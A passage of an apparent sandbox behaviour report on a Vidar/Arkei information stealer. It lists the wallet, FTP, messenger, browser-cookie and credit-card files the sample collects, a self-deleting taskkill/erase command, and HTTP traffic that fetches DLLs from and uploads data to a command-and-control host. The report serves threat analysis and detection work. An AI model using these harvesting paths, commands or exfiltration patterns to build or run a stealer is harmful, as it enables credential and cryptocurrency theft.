  823. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  824.  
  825.  
  826. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\"
  827.  
  828.  
  829. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\*.*"
  830.  
  831.  
  832. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  833.  
  834.  
  835. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  836.  
  837.  
  838. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\"
  839.  
  840.  
  841. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\*.*"
  842.  
  843.  
  844. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  845.  
  846.  
  847. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  848.  
  849.  
  850. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  851.  
  852.  
  853. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  854.  
  855.  
  856. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  857.  
  858.  
  859. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\"
  860.  
  861.  
  862. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\*.*"
  863.  
  864.  
  865. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  866.  
  867.  
  868. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\"
  869.  
  870.  
  871. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  872.  
  873.  
  874. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\*.*"
  875.  
  876.  
  877.  
  878.  
  879. "Description": "Harvests credentials from local FTP client softwares",
  880. "Details":
  881.  
  882. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  883.  
  884.  
  885.  
  886.  
  887. "Description": "Harvests information related to installed instant messenger clients",
  888. "Details":
  889.  
  890. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  891.  
  892.  
  893.  
  894.  
  895. "Description": "Collects information to fingerprint the system",
  896. "Details":
  897.  
  898.  
  899. "Description": "Created network traffic indicative of malicious activity",
  900. "Details":
  901.  
  902. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  903.  
  904.  
  905.  
  906.  
  907. "Description": "Uses suspicious command line tools or Windows utilities",
  908. "Details":
  909.  
  910. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  911.  
  912.  
  913. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  914.  
  915.  
  916. "command": "taskkill /im 9z25yPQnjM.exe /f"
  917.  
  918.  
  919.  
  920.  
  921.  
  922. * Started Service:
  923. "VaultSvc"
  924.  
  925.  
  926. * Mutexes:
  927. "Local\\_!MSFTHISTORY!_",
  928. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  929. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  930. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
  931. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  932. "Global\\ADAP_WMI_ENTRY",
  933. "Global\\RefreshRA_Mutex",
  934. "Global\\RefreshRA_Mutex_Lib",
  935. "Global\\RefreshRA_Mutex_Flag"
  936.  
  937.  
  938. * Modified Files:
  939. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  940. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  941. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  942. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  943. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
  944. "C:\\ProgramData\\freebl3.dll",
  945. "C:\\ProgramData\\mozglue.dll",
  946. "C:\\ProgramData\\msvcp140.dll",
  947. "C:\\ProgramData\\nss3.dll",
  948. "C:\\ProgramData\\softokn3.dll",
  949. "C:\\ProgramData\\vcruntime140.dll",
  950. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\ld",
  951. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\historych",
  952. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
  953. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
  954. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\c",
  955. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
  956. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\wd",
  957. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
  958. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
  959. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy\\\\xef\\x94\\x98\\xcd\\xb4\\xef\\x93\\x94\\x18\\xe3\\xa2\\x9e\\xe7\\x9c\\x86\\xc4\\xb8\\xc8\\x82",
  960. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
  961. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
  962. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
  963. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
  964. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12",
  965. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum\\",
  966. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n",
  967. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC\\",
  968. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\\n",
  969. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\",
  970. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash\\",
  971. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge\\\n",
  972. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash\\",
  973. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore\\",
  974. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\",
  975. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\",
  976. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\",
  977. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\",
  978. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\",
  979. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\",
  980. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\",
  981. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\",
  982. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD\\\n",
  983. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\",
  984. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin\\",
  985. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\",
  986. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\",
  987. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\",
  988. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\",
  989. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\",
  990. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\",
  991. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\",
  992. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX\\",
  993. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
  994. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
  995. "\\Device\\LanmanDatagramReceiver",
  996. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  997. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  998. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  999.  
  1000.  
  1001. * Deleted Files:
  1002. "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp",
  1003. "C:\\ProgramData\\freebl3.dll",
  1004. "C:\\ProgramData\\mozglue.dll",
  1005. "C:\\ProgramData\\msvcp140.dll",
  1006. "C:\\ProgramData\\nss3.dll",
  1007. "C:\\ProgramData\\softokn3.dll",
  1008. "C:\\ProgramData\\vcruntime140.dll",
  1009. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
  1010. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill",
  1011. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
  1012. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC",
  1013. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
  1014. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
  1015. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
  1016. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies",
  1017. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
  1018. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
  1019. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads",
  1020. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
  1021. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History",
  1022. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
  1023. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
  1024. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg",
  1025. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy",
  1026. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft",
  1027. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin",
  1028. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin",
  1029. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin",
  1030. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore",
  1031. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin",
  1032. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin",
  1033. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash",
  1034. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum",
  1035. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC",
  1036. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum",
  1037. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus",
  1038. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin",
  1039. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko",
  1040. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin",
  1041. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD",
  1042. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin",
  1043. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin",
  1044. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin",
  1045. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX",
  1046. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin",
  1047. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin",
  1048. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin",
  1049. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge",
  1050. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin",
  1051. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin",
  1052. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin",
  1053. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin",
  1054. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash",
  1055. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets",
  1056. "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip",
  1057. "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
  1058. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  1059.  
  1060.  
  1061. * Modified Registry Keys:
  1062. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
  1063. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  1064. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4",
  1065. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  1066. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33",
  1067. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  1068. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708",
  1069. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DCEB3BF5-151E-4025-A595-D330A9AC667A",
  1070. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\211F1106-53AB-4021-868B-2F49FACAB8E4\\data",
  1071. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D7A509EA-AB99-4E2A-B99E-04EE4FF35A33\\data",
  1072. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\6E5C69F1-55AA-4A7A-B970-656893D7C708\\data"
  1073.  
  1074.  
  1075. * Deleted Registry Keys:
  1076.  
  1077. * DNS Communications:
  1078.  
  1079. "type": "A",
  1080. "request": "dersed.com",
  1081. "answers":
  1082.  
  1083. "data": "104.200.67.209",
  1084. "type": "A"
  1085.  
  1086.  
  1087.  
  1088.  
  1089. "type": "A",
  1090. "request": "ip-api.com",
  1091. "answers":
  1092.  
  1093. "data": "72.11.140.50",
  1094. "type": "A"
  1095.  
  1096.  
  1097. "data": "66.212.29.250",
  1098. "type": "A"
  1099.  
  1100.  
  1101.  
  1102.  
  1103.  
  1104. * Domains:
  1105.  
  1106. "ip": "104.200.67.209",
  1107. "domain": "dersed.com"
  1108.  
  1109.  
  1110. "ip": "72.11.140.50",
  1111. "domain": "ip-api.com"
  1112.  
  1113.  
  1114.  
  1115. * Network Communication - ICMP:
  1116.  
  1117. * Network Communication - HTTP:
  1118.  
  1119. "count": 1,
  1120. "body": "--1BEF0A57BE110FD467A--\r\n",
  1121. "uri": "http://dersed.com/288",
  1122. "user-agent": "",
  1123. "method": "POST",
  1124. "host": "dersed.com",
  1125. "version": "1.1",
  1126. "path": "/288",
  1127. "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1128. "port": 80
  1129.  
  1130.  
  1131. "count": 1,
  1132. "body": "",
  1133. "uri": "http://dersed.com/freebl3.dll",
  1134. "user-agent": "",
  1135. "method": "GET",
  1136. "host": "dersed.com",
  1137. "version": "1.1",
  1138. "path": "/freebl3.dll",
  1139. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1140. "port": 80
  1141.  
  1142.  
  1143. "count": 1,
  1144. "body": "",
  1145. "uri": "http://dersed.com/mozglue.dll",
  1146. "user-agent": "",
  1147. "method": "GET",
  1148. "host": "dersed.com",
  1149. "version": "1.1",
  1150. "path": "/mozglue.dll",
  1151. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1152. "port": 80
  1153.  
  1154.  
  1155. "count": 1,
  1156. "body": "",
  1157. "uri": "http://dersed.com/msvcp140.dll",
  1158. "user-agent": "",
  1159. "method": "GET",
  1160. "host": "dersed.com",
  1161. "version": "1.1",
  1162. "path": "/msvcp140.dll",
  1163. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1164. "port": 80
  1165.  
  1166.  
  1167. "count": 1,
  1168. "body": "",
  1169. "uri": "http://dersed.com/nss3.dll",
  1170. "user-agent": "",
  1171. "method": "GET",
  1172. "host": "dersed.com",
  1173. "version": "1.1",
  1174. "path": "/nss3.dll",
  1175. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1176. "port": 80
  1177.  
  1178.  
  1179. "count": 1,
  1180. "body": "",
  1181. "uri": "http://dersed.com/softokn3.dll",
  1182. "user-agent": "",
  1183. "method": "GET",
  1184. "host": "dersed.com",
  1185. "version": "1.1",
  1186. "path": "/softokn3.dll",
  1187. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1188. "port": 80
  1189.  
  1190.  
  1191. "count": 1,
  1192. "body": "",
  1193. "uri": "http://dersed.com/vcruntime140.dll",
  1194. "user-agent": "",
  1195. "method": "GET",
  1196. "host": "dersed.com",
  1197. "version": "1.1",
  1198. "path": "/vcruntime140.dll",
  1199. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1200. "port": 80
  1201.  
  1202.  
  1203. "count": 1,
  1204. "body": "--1BEF0A57BE110FD467A--\r\n",
  1205. "uri": "http://ip-api.com/line/",
  1206. "user-agent": "",
  1207. "method": "POST",
  1208. "host": "ip-api.com",
  1209. "version": "1.1",
  1210. "path": "/line/",
  1211. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1212. "port": 80
  1213.  
  1214.  
  1215. "count": 1,
  1216. "body": "",
  1217. "uri": "http://dersed.com/",
  1218. "user-agent": "",
  1219. "method": "POST",
  1220. "host": "dersed.com",
  1221. "version": "1.1",
  1222. "path": "/",
  1223. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40398\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1224. "port": 80
  1225.  
  1226.  
  1227.  
  1228. * Network Communication - SMTP:
  1229.  
  1230. * Network Communication - Hosts:
  1231.  
  1232. "country_name": "United States",
  1233. "ip": "72.11.140.50",
  1234. "inaddrarpa": "",
  1235. "hostname": "ip-api.com"
  1236.  
  1237.  
  1238. "country_name": "United States",
  1239. "ip": "104.200.67.209",
  1240. "inaddrarpa": "",
  1241. "hostname": "dersed.com"
  1242.  
  1243.  
  1244.  
  1245. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!